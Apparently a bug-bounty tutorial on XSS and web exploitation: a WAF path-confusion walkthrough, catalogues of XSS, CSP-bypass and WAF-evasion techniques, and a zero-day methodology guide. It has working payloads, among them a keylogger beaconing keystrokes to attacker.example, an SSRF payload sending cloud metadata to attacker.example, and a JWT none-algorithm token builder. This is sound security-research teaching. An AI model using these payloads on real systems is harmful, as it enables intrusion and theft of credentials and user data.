/api/v2/support/submit          → Support ticket submission
/static/                        → CSS, JS, images
/docs/                          → API documentation pages
  • The company uses a commercial WAF. The WAF operator has configured inspection profiles like this — though you can't see this directly, you're going to infer it through testing:
/login              → STRICT   (SQLi, XSS, brute force detection, everything)
/api/v2/search      → STANDARD (common SQLi and XSS signatures)
/api/v2/support/    → STANDARD
/static/            → NONE     (performance optimization — it's just files)
/docs/              → MINIMAL  (just block obviously malicious stuff)

Phase 1 — Establishing the Baseline Behavior:

  • You start by sending an obviously malicious payload to a known-strict endpoint. The canonical test payload is something that every WAF on earth blocks:
POST /login HTTP/1.1
Host: fintech.com
Content-Type: application/x-www-form-urlencoded

username=<script>alert(1)</script>&password=test

Response:

HTTP/1.1 403 Forbidden
X-Firewall-Rule: XSS-001
Content-Type: text/html

<html>Request blocked by security policy.</html>
  • Good. You've confirmed the WAF is active, you know what a block looks like (403 with X-Firewall-Rule header), and you know the login endpoint is under strict inspection. This is your baseline.

Now you send the exact same payload to the search endpoint:

GET /api/v2/search?q=<script>alert(1)</script> HTTP/1.1
Host: fintech.com
Cookie: session=yourvalidtoken

Response:

HTTP/1.1 200 OK
Content-Type: application/json

{"results": [], "query": "<script>alert(1)</script>", "count": 0}
  • The WAF passed it. The application received the payload, processed it, and returned it in the JSON response. The WAF's inspection profile for /api/v2/search either doesn't include XSS rules, or includes only a subset that this payload bypassed. You've just discovered your first inconsistency.
  • But you need to be careful about what you've actually proven. The application returned the payload in a JSON response body with Content-Type: application/json.
  • The browser won't execute that as HTML — JSON responses aren't parsed as HTML documents. So this specific reflection isn't exploitable yet. What you've confirmed is that the WAF is not inspecting this path with the same rules as /login.
  • That's the valuable discovery. Now you need to find a reflection context in this path family that actually results in execution.

Phase 2 — Mapping the Inconsistency Across Paths:

  • You now systematically test every path you've enumerated with the same baseline payload, recording the response for each:
/login                    → 403 (WAF blocks)
/api/v2/search            → 200 (WAF passes)
/api/v2/transactions      → 200 (WAF passes)  
/api/v2/support/submit    → 200 (WAF passes)
/static/app.js            → 200 (WAF passes — expected, it's a file)
/docs/getting-started     → 200 (WAF passes)
  • Every API path under /api/v2/ passes the payload through. You now have a clear picture: the WAF applies strict XSS inspection only to /login. Everything else is under lighter inspection or uninspected entirely.
  • Now you refine your testing. The search path reflected your payload in JSON, which wasn't directly exploitable. But is there another endpoint under /api/v2/ that reflects input into an HTML context? You look at the support ticket submission endpoint, because support ticket systems frequently generate HTML emails or HTML-rendered ticket views.
POST /api/v2/support/submit HTTP/1.1
Host: fintech.com
Content-Type: application/json
Cookie: session=yourvalidtoken

{
    "subject": "Test ticket",
    "message": "<script>alert(document.domain)</script>"
}

Response:

HTTP/1.1 200 OK
Content-Type: application/json

{"ticket_id": "TKT-4821", "status": "submitted"}
  • The WAF passed it. Now you visit the ticket in the customer portal and look at how it renders. If the portal renders ticket content as HTML rather than plain text, you have stored XSS through a path the WAF doesn't inspect with XSS rules — even though the login path directly above it in the same application is fully protected.

Phase 3 — Understanding Why the Gap Exists:

  • The gap exists for a precise reason that's worth articulating. WAF rules are applied based on the URL path prefix matched against a policy table. The policy table looks something like this internally:
Rule Priority    Path Pattern       Profile Applied
1               /login             STRICT_AUTH
2               /admin/*           STRICT_ADMIN  
3               /api/v2/*          API_STANDARD
4               /static/*          NONE
5               /*                 DEFAULT
  • The WAF operator made a decision: the API endpoints receive API_STANDARD inspection rather than full XSS inspection. The reasoning might have been that API endpoints return JSON, not HTML, so XSS rules are irrelevant. That reasoning is flawed in two ways.
  • First, it assumes all API endpoints always return JSON. But your support endpoint stores the input and renders it later in an HTML context — the HTML rendering happens at the portal layer, which serves from /portal/tickets/TKT-4821, a different path that might have HTML inspection. But the storage happened via the API path, which is under lighter inspection. The injection and the rendering happen through different paths, and the WAF's path-based model doesn't account for this.
  • Second, even endpoints that return JSON can have their output embedded in HTML by a JavaScript frontend that uses innerHTML to render server responses — the DOM XSS scenario. The WAF's assumption that "JSON context means no XSS risk" is wrong for any application with a rich JavaScript frontend.
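That second failure mode is easy to picture with a small frontend sketch — illustrative code, not the target's actual bundle: the API really does return JSON, but the SPA sinks one of its fields into innerHTML.

// The search API responds with JSON, so the WAF's "no HTML context" assumption
// seems to hold — until the frontend renders a JSON field with innerHTML
const params = new URLSearchParams(location.search);

fetch('/api/v2/search?q=' + encodeURIComponent(params.get('q') || ''))
    .then(r => r.json())
    .then(data => {
        // data.query echoes attacker-influenced input; innerHTML makes it a DOM XSS sink
        document.getElementById('results-header').innerHTML =
            'Results for: ' + data.query;
    });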

Phase 4 — Escalating From Discovery to Exploitation:

  • Now let's say the stored XSS in the support ticket isn't accessible to you directly — you submitted the ticket, it goes to a support agent's admin panel, and you can't see that panel. You've established blind XSS potential. But let's pursue a different angle.
  • You notice the docs endpoint also passed the payload. You look at the documentation system more carefully. It's a documentation platform where the company can embed code examples. You find a search feature within the docs:
GET /docs/search?query=<img src=x onerror=alert(document.domain)> HTTP/1.1
Host: fintech.com
  • The WAF passes this. The docs search page returns:
HTTP/1.1 200 OK
Content-Type: text/html

<html>
<body>
    <h2>Search Results for: <img src=x onerror=alert(document.domain)></h2>
    <div class="results">No results found.</div>
</body>
</html>
  • This is reflected XSS. The response is text/html. The browser will parse it. The <img> tag will be created, src=x will fail to load, and onerror=alert(document.domain) will fire. The WAF blocked the same payload on /login but passed it here because /docs/* has minimal inspection.
  • The business impact might seem lower because /docs/ is a documentation page rather than a financial dashboard. But the domain is fintech.com. JavaScript executing there has the same origin as the entire application. Depending on whether the documentation portal shares cookies with the main application, the attacker can potentially steal session tokens that work across the whole domain.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Thanks For Reading std::cout << "Friend" << std::endl;

TECHNIQUES COVERED

1. Reflected XSS: Input submitted in a request is reflected in the immediate response without storage. Requires the victim to click a crafted link. The payload exists only in the URL — not stored anywhere on the server.

2. Stored XSS: Input is saved to the server (database, file, log) and later rendered to other users. No link delivery needed — the payload executes for every user who loads the affected page. Higher impact than reflected due to reach and persistence.

3. DOM-based XSS: The server is uninvolved. A client-side script reads from an attacker-controlled source (URL hash, window.name, postMessage) and writes it to a DOM sink (innerHTML, eval). Never appears in the HTTP response — invisible to server-side scanners.

4. Blind XSS: A stored XSS that fires in a context the attacker can't directly observe — typically an admin panel, email renderer, or internal tool. Requires a callback payload that exfiltrates data to an attacker-controlled server when it fires.

5. Mutation XSS (mXSS): Exploits the difference between how a sanitizer parses HTML and how the browser re-parses the sanitizer's output. A payload that's safe after one parse round becomes dangerous after serialization and re-parsing. Targets sanitizer libraries that use innerHTML round-trips.

6. DOM Clobbering: Uses HTML injection (not JavaScript) to overwrite global JavaScript variables by creating elements whose id or name attributes match variable names the application's code references. Can create XSS from HTML-only injection.

7. Prototype Pollution → XSS: Injects properties into Object.prototype via a vulnerable deep merge or assignment function. Downstream library code that reads those properties and sinks them into the DOM produces XSS. The injection and execution are in different code paths.

8. Polyglot Payloads: Single strings crafted to execute in multiple injection contexts simultaneously — HTML body, quoted attribute, JavaScript string, URL context. Used diagnostically to determine which context your input lands in, and offensively against applications where the context is ambiguous.

9. Client-Side Template Injection (CSTI): User input is evaluated as a template expression by a client-side framework (AngularJS, Vue). The template engine's expression evaluator executes the attacker's input as code. Detected by injecting {{7*7}} and observing whether the page renders 49.

10. Filter Bypass — Case Variation: HTML tag names and event handler attribute names are case-insensitive. <ScRiPt>, <SCRIPT>, OnErRoR all work identically to their lowercase versions. Bypasses naive filters that only check for the lowercase form.

11. Filter Bypass — Tag Substitution: Replaces blocked tags (<script>) with alternative execution vectors (<svg onload>, <img onerror>, <input autofocus onfocus>, <details ontoggle>). Exploits incomplete tag blocklists that focus on obvious tags and miss the broader execution surface.

12. Filter Bypass — Encoding Tricks: Uses HTML entity encoding, URL encoding, Unicode escapes, or Base64 in data URIs to represent payload characters in forms the filter doesn't recognize. The browser's decoder runs after the filter, converting encoded characters back to their dangerous forms before parsing or execution.

13. Filter Bypass — Null Bytes: Inserts null bytes (\x00) within strings that some parsers treat as string terminators, splitting the payload in a way that confuses the filter while the HTML parser reconstructs the intended string.

14. Filter Bypass — Unusual Whitespace: Uses tab characters (\x09), newlines (\x0a), carriage returns (\x0d) within or between HTML tags and attributes. These are valid HTML whitespace but may not match filter patterns expecting standard spaces.

15. HTML Entity Encoding in Event Handlers: Encodes JavaScript payload characters as HTML entities within event handler attribute values. The HTML parser decodes entities before passing the attribute value to the JavaScript engine, so the JavaScript engine receives the decoded, executable code while the filter saw only harmless entity sequences.

16. SSR JSON Injection: Injects into server-side rendered JSON state blobs embedded in <script> tags. The </script> sequence closes the script block regardless of being inside a JSON string, allowing tag injection from JSON data. Fixed by escaping < as \u003c in SSR serializers.

17. javascript: URI Injection: Injects javascript:alert(1) into href, src, or action attributes that accept URLs. When the user clicks or the browser loads the URL, the JavaScript expression is evaluated in the page's context.

18. window.name XSS: Sets window.name to an XSS payload on an attacker-controlled page, then navigates or redirects to the victim application. The window.name value persists through the navigation. If the victim application reads window.name and sinks it into the DOM, XSS fires in the victim's origin.

19. srcdoc CSP Bypass: Uses the iframe srcdoc attribute to create a same-origin child frame whose content is specified inline. In some CSP configurations, inline scripts in srcdoc frames are not blocked by the parent's CSP, allowing script execution that the parent's script-src policy would otherwise prevent.

20. about:blank Origin Inheritance: Creates an about:blank iframe whose origin is inherited from the creator. JavaScript in this frame has full same-origin access to the parent. Used as a staging area for execution that may bypass certain CSP configurations or as a cross-frame DOM access mechanism.

21. Keylogger Injection: Adds an addEventListener('keydown', ...) handler to the document via XSS. Captures every keystroke including characters typed in password fields (the raw keydown event, not the input event value). Buffers captured keystrokes and exfiltrates them at intervals via navigator.sendBeacon. A minimal sketch appears after this list.

22. Credential Phishing Overlay: Injects a full-page overlay via XSS that mimics the application's login interface. Because the overlay appears on the legitimate domain, the address bar shows the trusted URL. Captured credentials are posted to an attacker-controlled server. The overlay is removed after submission to avoid suspicion.

23. Cookie Exfiltration: Reads document.cookie via XSS and sends the value to an attacker-controlled server. Limited by the HttpOnly flag, which makes session cookies invisible to JavaScript. Bypassed by targeting localStorage tokens or using the session implicitly via authenticated API requests.

24. DNS Exfiltration: Encodes stolen data as subdomains of an attacker-controlled domain and triggers lookups of those subdomains — most reliably via injected <link rel="dns-prefetch"> elements, which browsers have historically resolved without applying CSP fetch directives. The resolver query itself carries the data to the attacker's authoritative nameserver, so the channel works even when the CSP blocks every HTTP-based exfiltration path.

25. Internal Network Pivoting via fetch(): Uses the victim's browser as a proxy to make requests to internal network resources inaccessible from the public internet. The victim's browser can reach 192.168.x.x, internal admin panels, cloud metadata endpoints, and IoT devices on the local network. Port scanning is accomplished by observing timing and error type differences.
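
A minimal sketch of technique 21 (Keylogger Injection), assuming script execution has already been achieved on the victim page. attacker.example stands in for an attacker-controlled endpoint:

// Minimal keylogger sketch. attacker.example is hypothetical; assumes an
// existing XSS foothold on the page.
(function () {
  let buffer = [];

  document.addEventListener('keydown', function (e) {
    // Raw keydown captures characters even when typed into password fields.
    buffer.push(e.key);
  }, true);

  setInterval(function () {
    if (buffer.length === 0) return;
    // sendBeacon queues the request without blocking and survives unloads.
    navigator.sendBeacon('https://attacker.example/k', buffer.join(''));
    buffer = [];
  }, 5000);
})();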

SECTION 10 — CSP BYPASS TECHNIQUES

1. JSONP Endpoint Bypass: Uses a JSONP endpoint hosted on a whitelisted script-src domain to execute arbitrary JavaScript. JSONP endpoints reflect a callback parameter name as a function call in their response — if the attacker controls the callback name, they control what JavaScript executes. The response is valid JavaScript served from a trusted domain, satisfying the CSP. A sketch appears after this list.

2. Open Redirect in Whitelisted Domain: Exploits an open redirect on a CSP-whitelisted domain to deliver an external script. The CSP allows the initial request to the trusted domain; the redirect delivers attacker-controlled content.

3. base-uri Missing Bypass: Injects <base href="https://attacker.com/"> when the CSP lacks a base-uri directive. Causes all relative URLs on the page to resolve against the attacker's domain, redirecting relative script loads to attacker-controlled servers even under a script-src 'self' policy.

4. Script Gadgets: Manipulates existing, nonce-bearing scripts on the page through DOM injection rather than injecting new scripts. Injects HTML that triggers behavior in trusted scripts — Angular template expressions, data attributes read by trusted scripts — to execute attacker-controlled code without needing a new script tag.

5. form-action Missing Bypass: When form-action is absent from the CSP, injects a modified form action pointing to an attacker-controlled server. Harvests submitted form data (credentials, payment information) even when JavaScript execution is blocked by other CSP directives.

6. Nonce Extraction: Reads an existing nonce value from a legitimate script tag via document.querySelector('script[nonce]').nonce and uses it on subsequently injected script tags. Requires some JavaScript execution first — used to escalate limited execution to full CSP bypass.

7. Unsafe-inline Detection: The trivial bypass — checks whether script-src includes 'unsafe-inline', which allows all inline scripts and event handlers, completely negating CSP protection against XSS. The first thing to check in any CSP.
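
A sketch of bypass 1, assuming the page's CSP is script-src 'self' https://api.trusted-cdn.example and that the whitelisted host exposes a classic JSONP endpoint reflecting its callback parameter — both the host and the endpoint are hypothetical:

<!-- trusted-cdn.example is allowed by script-src and reflects the callback
     parameter verbatim into a JavaScript response. -->
<script src="https://api.trusted-cdn.example/data?callback=alert(document.domain);//"></script>

<!-- The response body is then valid JavaScript served from an allowed origin:
     alert(document.domain);//({"data": ...})
     The CSP is satisfied; the attacker chose what executes. -->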

SECTION 11 — WAF EVASION TECHNIQUES

1. Chunked Transfer Encoding Bypass: Splits a malicious payload across multiple HTTP transfer-encoding chunks so that no individual chunk triggers WAF signatures. The backend reassembles the chunks into the complete payload. Exploits WAFs that inspect chunks individually rather than the reassembled body.

2. HTTP Parameter Pollution (HPP): Sends the same parameter multiple times in a request. Exploits discrepancies between how the WAF reads parameter values (often the first occurrence) and how the backend framework processes them (often the last occurrence, or a concatenation). Hides payloads in parameter positions the WAF doesn't inspect.

3. Charset Confusion: Declares a non-standard charset in the Content-Type header. If the WAF decodes the request body using one charset while the backend uses another, the WAF may see garbled or different bytes than what the application actually processes.

4. Comment Insertion: Breaks up signature strings using JavaScript comments (/* */, //) placed between tokens. Because the JS engine treats a comment as whitespace, alert/**/(1) no longer matches a WAF signature written for alert(1) yet executes identically. Comments cannot split a single identifier — al/**/ert(1) is a syntax error — so they go between the function name and its argument list, between arguments, or around operators.

5. Identifier Unicode Escapes: Uses JavaScript's \uXXXX Unicode escape syntax in identifiers. \u0061lert(1) is equivalent to alert(1). WAF signatures matching the ASCII string alert won't match the escaped form, but the JavaScript engine evaluates both identically.

6. String Concatenation: Builds blocked strings through concatenation: window['al'+'ert'](1). No single string token in the payload matches alert. The concatenation happens at runtime.

7. Path Confusion: Tests payloads across different URL paths on the same application to exploit inconsistent WAF inspection profiles. High-value endpoints get strict inspection; lower-priority paths may have weaker or no inspection of the same payload types.

8. HTTP Verb Tampering: Sends requests using unusual HTTP methods (PUT, PATCH, DELETE, OPTIONS, TRACE) that the WAF may not inspect as thoroughly as GET and POST. Some applications process these methods and reflect parameters, while the WAF's ruleset focuses on common methods.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Find Your Purpose, Good Bye

Zero-Day Finding — The Complete Mindset & Methodology Guide

A zero-day is not found by running a scanner. It's found by understanding a system deeply enough to see what its builders didn't see. Everything in this guide is about developing that kind of vision.

What a Zero-Day Actually Is

A zero-day is a vulnerability unknown to the vendor — no patch exists, no CVE has been assigned, no public disclosure has happened. The term is often misused to mean "any unpatched vulnerability." The precise meaning is: the vendor has zero days of warning. You found something they don't know about.

The practical implication is that finding zero-days requires going somewhere automated tools and known-vulnerability databases haven't already gone. That means either looking at new code, looking at old code in a new way, or looking at interactions between components that no one has modeled carefully before.

The Core Mental Shift

Every security tool you've learned — Burp Suite, DalFox, SQLMap, nuclei — finds known vulnerability patterns. They're pattern matchers. They're valuable, but they find yesterday's vulnerabilities, not tomorrow's. Zero-day research requires a different mode of thinking entirely.

The shift is from asking "does this match a known pattern?" to asking "does this system behave consistently with its own assumptions?"

Every application is a set of assumptions layered on top of other assumptions. The developer assumes the HTML parser will treat their template as they intend. The developer assumes their sanitizer covers all execution vectors. The developer assumes the cache will key on everything that matters. The developer assumes the XML parser won't make external network requests. Zero-days live in the gaps between what developers assume and what systems actually do. Your job is to find those gaps.

The Five Questions — Applied to Every Feature

When you encounter any feature in any application, run it through these five questions before you test anything. This is the zero-day thinking process made explicit.

Question 1: Where does user input enter this feature?

  • Think beyond the obvious. The form field is obvious. What about the file name of an uploaded file? The metadata embedded in an uploaded image? The OAuth callback URL? The webhook destination URL? The email address used for registration? The browser's Accept-Language header that the application uses to serve localized content? The value of a cookie the application reads and processes? The referrer header? Every one of these is user-controlled input. Map all of them before testing any of them.

Question 2: What transformations happen between input and output?

  • Trace the data forward. Does it get stored? In what format? Does a different component retrieve it? Does it get sanitized? At which layer — storage or retrieval? Does it get encoded? Does it get decoded somewhere downstream? Does it pass through multiple systems — an API gateway, a message queue, a background worker, a template renderer? Each transformation is a potential point where the developer's model of the data diverges from what the data actually contains.

Question 3: What does the system trust that it shouldn't?

  • Enumerate the trust assumptions. The application trusts that JPEG files uploaded to the image endpoint are actually images. The application trusts that the user ID in the JWT was set by the server. The application trusts that the hostname in the Host header matches one of its configured domains. The application trusts that the URL provided for webhook testing points to an external service, not to 169.254.169.254. Each trust assumption that isn't enforced by a check is a potential vulnerability.

Question 4: Where does this feature interact with other features?

  • Isolated features are usually well-tested in isolation. The interesting vulnerabilities live at feature intersections. The file upload feature combined with the document preview feature. The search feature combined with the export-to-PDF feature. The user profile field combined with the admin notification system. When two features interact, each was probably designed and tested without deep consideration of the other. The interaction surface is where assumptions break.

Question 5: What happens at the boundaries of expected input?

  • Every feature has an implicit model of what valid input looks like. What happens at the edges of that model? What if the string is 0 characters? 100,000 characters? What if the number is negative? Zero? Float instead of integer? What if the JSON has unexpected nested depth? What if the array has 10,000 elements? What if the filename contains a null byte? A forward slash? Unicode right-to-left override characters? Boundary conditions are where parsers and validators make mistakes.

The Assumption Mapping Process

Before touching Burp Suite, before sending a single request, do this on paper or in a notes file. Take the feature you're researching and write out every assumption the system makes about it in plain language.

For a file upload feature, the assumption list might look like:

1. The uploaded file is the type declared by its extension
2. The uploaded file is the type declared by its Content-Type header
3. The uploaded file content matches its declared type
4. The file name doesn't contain path traversal sequences
5. The file name doesn't contain null bytes
6. The file doesn't contain embedded scripts (for image types)
7. The file size is within limits
8. The file doesn't reference external entities (for XML-based formats)
9. Processing the file doesn't execute any code
10. The storage path for the file is controlled by the server, not the client.

Now go through each assumption and ask: where is this assumption enforced? Is it enforced by a check in the application code? By the storage backend? By the CDN? By the browser? By convention? Assumptions enforced by convention rather than code are your primary targets.

For assumption 1 (the file matches its declared extension): is this checked at all? If the check is "does the filename end in .jpg", what happens when you upload a file named shell.php.jpg? What does the server do with it? Does it store it and serve it? What Content-Type does it serve it with? If the server serves it with Content-Type: image/jpeg, the browser won't execute it. If the server sniffs the content and determines it's PHP, it might execute it. If the server stores it and another component processes it, that component might not apply the same check.
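
A sketch of how assumption 1 usually fails in practice — the function and filenames below are invented for illustration:

// Illustrative only: the kind of naive extension check assumption 1
// often reduces to.
function looksLikeImage(filename) {
  const f = filename.toLowerCase();
  return f.endsWith('.jpg') || f.endsWith('.png');
}

looksLikeImage('cat.jpg');        // true  — the intended case
looksLikeImage('shell.php.jpg');  // true  — passes, but a later component
                                  //         may route or execute on ".php"
looksLikeImage('shell.php');      // false — the only case the check stops

// The check inspects the name, never the bytes. Whether that matters depends
// on what the storage layer, CDN, or a downstream processor does with the
// file — exactly the follow-up questions in the paragraph above.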

This process — enumerate assumptions, then verify each one — is the systematic approach to finding vulnerabilities that automated tools miss.

Reading Source Code for Zero-Days

When source code is available — open source applications, extracted source maps, GitHub repositories for targets with a bug bounty program that includes open-source components — code review accelerates zero-day discovery dramatically. Here is the specific reading process.

Start with the data flow, not the feature list. Don't read the code top to bottom. Find the entry points — the HTTP route handlers, the WebSocket message handlers, the message queue consumers — and trace data forward from those entry points. Follow the data through function calls, across module boundaries, into storage and back out of storage, until it reaches an output sink or a privileged operation.

Look for the distance between validation and use. The most dangerous pattern in any codebase is validation at one layer and use at another, with no guarantee that the data hasn't changed between the two. A URL is validated to be an https:// URL at the API controller layer, then stored, then fetched by a background worker that doesn't re-validate. Between storage and execution, can the URL be modified? Is there a race condition? Can an attacker trigger the fetch before the validation result is applied?
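
A sketch of that distance, with hypothetical names throughout — validation lives in the controller, use lives in a worker, and nothing re-checks the value in between:

// Illustrative pattern only. Layer 1: API controller — validates, then stores.
function createWebhook(db, userId, url) {
  if (!url.startsWith('https://')) throw new Error('invalid URL');
  db.save({ userId, url });   // validated *now*; db is a hypothetical store
}

// Layer 2: background worker — runs minutes or days later.
async function deliverWebhook(db, hookId, payload) {
  const hook = db.load(hookId);
  // No re-validation here. If the URL can change between save and delivery
  // (an update endpoint with weaker checks, a DNS record that now resolves
  // internally, a race during creation), the original check says nothing
  // about what actually gets fetched.
  await fetch(hook.url, { method: 'POST', body: JSON.stringify(payload) });
}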

Find the places where the developer left a note. Comments like "// TODO: sanitize this", "// FIXME: validate input here", "// temporary workaround", or "// this assumes X" are direct admission of unresolved assumptions. Every TODO in a security-relevant code path is a potential finding.

Look for framework misuse. Every framework has a safe default and an unsafe escape hatch. React has dangerouslySetInnerHTML. Angular has bypassSecurityTrustHtml. Django's ORM has .raw(). Rails has html_safe. SQLAlchemy has text(). grep for every escape hatch in the codebase and examine each one. Ask: who controls the value being passed here, and did the developer actually verify it's safe?

Grep for known-dangerous patterns regardless of context. Even if a specific instance turns out to be safe, building a map of where every dangerous pattern appears tells you where to focus attention. Your grep list for a JavaScript codebase:

innerHTML
outerHTML
insertAdjacentHTML
document.write
eval(
Function(
setTimeout(  ← only dangerous when first arg is a string
setInterval(  ← same
location.href =
location.assign
location.replace
window.name
document.referrer
postMessage
localStorage
dangerouslySetInnerHTML
v-html
bypassSecurityTrust
srcdoc
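
A starting point for that sweep using standard grep flags — adjust the pattern set and the path to the codebase at hand:

grep -rnE "innerHTML|insertAdjacentHTML|document\.write|eval\(|new Function|dangerouslySetInnerHTML|v-html|bypassSecurityTrust|srcdoc" src/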

The Changelog Reading Habit

Every security patch in a software changelog is a description of a vulnerability that existed before the patch. If you read the security patches for a library, framework, or application, you learn:

  • What class of vulnerability the developers have made before
  • Where in the codebase they tend to make mistakes
  • What assumptions they hold that have been violated in the past

Developers are human and tend to repeat patterns — both good patterns and mistake patterns. A project that has had multiple XSS vulnerabilities in its template rendering layer probably still has undiscovered ones in adjacent code. A project that has had multiple SSRF vulnerabilities in its URL-fetching code probably has additional fetch operations that haven't been audited.

Read the CVE history for every major dependency in your target's stack. Read the GitHub issues tagged "security." Read the security bulletins. Each one is a map to the developer's blind spots.

Feature Interaction Research — The Highest-Yield Approach

The most consistently productive zero-day research approach is deliberately combining features that were designed independently and observing what happens at their intersection.

The process is systematic. List every feature in the application that accepts input. List every feature that produces output. Draw lines between every input feature and every output feature and ask: could data from this input reach this output, even indirectly?

Some intersection examples that have historically produced zero-days:

Profile field → PDF export: The user sets a name or bio containing XSS payload characters. The application has a feature that exports account data to PDF. The PDF generation library (wkhtmltopdf, puppeteer, PhantomJS) renders HTML — and if it renders the user's profile field without sanitization, the XSS fires in the headless browser's context, potentially accessing the PDF generator's internal network. This is SSRF via XSS via PDF generation — a three-component chain.
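
A sketch of what the profile field might carry for that chain. The 169.254.169.254 paths are the real AWS IMDSv1 metadata locations, but whether the renderer executes HTML or JavaScript, and whether IMDSv2 (which requires a session token) blocks the read, are assumptions to verify per target; attacker.example is a placeholder:

<!-- Placed in a bio/name field that the PDF exporter renders as HTML.
     The fetch happens from the renderer's network position, not the user's. -->
<iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" width="700" height="400"></iframe>

<!-- Variant for renderers that execute JavaScript: read the metadata and
     exfiltrate it to a hypothetical attacker-controlled host. -->
<script>
  fetch('http://169.254.169.254/latest/meta-data/')
    .then(r => r.text())
    .then(t => fetch('https://attacker.example/x', { method: 'POST', body: t }));
</script>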

Search → Email notification: The application sends email notifications summarizing recent search queries. If the email is rendered as HTML and the search query is embedded without encoding, an XSS payload in the search query fires when the email is opened in a web-based email client. Web-based email clients are a different origin, so cookie theft isn't the goal — but the attacker can exfiltrate email content, inject links, or perform actions in the email client's context.

Webhook URL → Internal network: The application allows users to set webhook URLs for notifications. The webhook is fetched by the server. This is a classic SSRF if the server doesn't validate that the URL points to an external host. But even if the server validates the URL when it's set, does it re-validate when the webhook is triggered? Is there a race condition between validation and trigger?

Import feature → SQL injection: An application allows importing data from CSV or JSON files. The import parser constructs database queries from the imported data. If the parser doesn't parameterize those queries, an attacker can embed SQL injection payloads in the CSV that execute when the import is processed. This often bypasses WAF protection because the payload is inside an uploaded file, not a URL parameter.
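
A sketch of the shape of such a row and of the code pattern that makes it dangerous — the table, columns, and db.query call are invented for illustration:

// Hypothetical CSV row after parsing — the name field carries the payload.
const row = { name: "Bob','admin');--", email: 'bob@example.com' };

// Vulnerable pattern: the importer interpolates parsed fields into SQL.
const unsafe = "INSERT INTO contacts (name, role) VALUES ('" + row.name + "', 'user')";
console.log(unsafe);
// INSERT INTO contacts (name, role) VALUES ('Bob','admin');--', 'user')
//   → the quote closes early, a second value is smuggled in, and the
//     trailing SQL is commented out.

// Safe pattern (illustrative driver API): keep the field as data.
// db.query('INSERT INTO contacts (name, role) VALUES (?, ?)', [row.name, 'user']);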

The New Feature Opportunity Window

New features are the highest-density source of zero-days in any codebase. When a company ships a major new feature, that code has:

  • Less time in production than older code
  • Fewer security reviews than mature code
  • More aggressive assumptions because the developers were focused on making it work
  • Less integration with the existing security infrastructure (input validation, CSP, parameterized queries) that mature parts of the application have accumulated

Watch bug bounty program changelogs. Watch product announcement pages. Watch app store release notes. When a new feature is announced, that's the signal to go look at it before anyone else does. The window between a feature's release and its first vulnerability report is your opportunity window.

The tactical approach is to map the new feature's complete input surface immediately after release — before it's been security-tested — and run it through the five questions and the assumption mapping process. You're racing other researchers to be the first to apply careful adversarial thinking to code that hasn't had it applied yet.

Library and Dependency Research

Applications are built on dependencies — frameworks, utility libraries, parsing libraries, authentication libraries. Each dependency is a trust boundary: the application trusts the library to behave correctly and securely. When a library has a vulnerability, every application using that library inherits the vulnerability.

Zero-day research on libraries is high leverage because a single finding affects every application using that library version. The research process is to take a library, understand its security-relevant promises (the behaviors it guarantees), and then try to find inputs that violate those promises.

For a sanitization library, the promise is: "my output is safe for insertion into HTML." Try to find inputs where the output is not safe. Focus on:

  • Inputs that exploit the difference between the library's parser and the browser's parser (mXSS territory)
  • Inputs that exploit namespace switching between HTML, SVG, and MathML contexts
  • Inputs that are valid under one HTML5 parsing algorithm variant but produce different output under another
  • Inputs at the boundaries of the library's allowed-elements and allowed-attributes configuration
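
A small browser-context harness for feeding candidate inputs from all four buckets through a sanitizer and a re-parse. DOMPurify is used only as an example target and must already be loaded on the page; the detector is deliberately crude, and the sample input is just a candidate — the point is the serialize-and-re-parse round trip where mutations appear:

// Sketch: sanitize, let the browser parse the result, serialize it, parse it
// again, and see whether anything script-capable survived or appeared.
function roundTripCheck(input) {
  const clean = DOMPurify.sanitize(input);   // parse #1: the sanitizer's view

  const host = document.createElement('div');
  host.innerHTML = clean;                    // parse #2: the browser's view
  const serialized = host.innerHTML;         // serialize
  host.innerHTML = serialized;               // parse #3: a second round trip

  const hit = host.querySelector('script, [onerror], [onload], iframe[srcdoc]');
  if (hit) console.log('possible mutation:', input, '=>', host.innerHTML);
}

// Feed it candidates that straddle HTML/SVG/MathML namespaces, broken
// comments, nested <noscript>/<style> constructs, and so on.
roundTripCheck('<svg></p><style><a title="</style><img src=x onerror=alert(1)>">');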

For an authentication library, the promise is: "a token I verify was issued by me and hasn't been tampered with." Try to find:

  • Algorithm confusion attacks (RS256 vs HS256 in JWT)
  • None algorithm acceptance (a construction sketch follows this list)
  • Key confusion between public and private keys
  • Timing-based signature verification bypasses
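
A sketch for the none-algorithm check: build an unsigned token and see whether the verifier accepts it. btoa is available in browsers and recent Node; the claim values are placeholders:

// Builds an alg:"none" token — header.payload. with an empty signature.
// Whether a given library accepts it is exactly what you're testing.
function b64url(obj) {
  return btoa(JSON.stringify(obj))
    .replace(/\+/g, '-').replace(/\//g, '_').replace(/=+$/, '');
}

const header  = { alg: 'none', typ: 'JWT' };
const payload = { sub: 'admin', iat: Math.floor(Date.now() / 1000) };  // placeholder claims

const token = b64url(header) + '.' + b64url(payload) + '.';
console.log(token);
// Submit it in place of a legitimate token; a correct verifier must reject it.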

Documentation as an Attack Surface

API documentation, developer guides, and changelog notes are often the most accurate description of what a system actually does — more accurate than the code comments and sometimes more accurate than the code itself, because documentation is written for communication rather than implementation. Developers don't lie in documentation the way they sometimes cut corners in implementation.

Read the documentation for your target's API with adversarial eyes. When the documentation says "this endpoint accepts a URL for webhook delivery," that's an admission that the server fetches URLs. When it says "this field supports rich text formatting," that's an admission that user input is rendered as HTML somewhere. When it says "this feature integrates with third-party services," that's an admission of outbound network requests that might be redirectable.

Look for features documented as deprecated but not removed. Deprecated features are still in the codebase but receive less security review. Developers don't update security controls on deprecated endpoints. They don't add new mitigations to code they're planning to remove. But "planning to remove" often means "will be there for another three years."

The Zero-Day Researcher's Daily Practice

Zero-day research is a practice, not an event. The researchers who consistently find novel vulnerabilities do specific things regularly that compound into deep intuition over time.

They read browser engine changelogs and specification updates. When the HTML5 parsing specification changes or when a browser engine changes how it handles a specific tag or attribute, there's a window where applications that relied on the old behavior are suddenly vulnerable to a new attack vector that didn't exist before.

They read security research papers. Academic papers on web security, browser security, and protocol security often describe vulnerability classes years before those classes become widely exploited. The mXSS research, the HTTP request smuggling research, the cache deception research — all of these were described in papers before they became mainstream bug bounty findings.

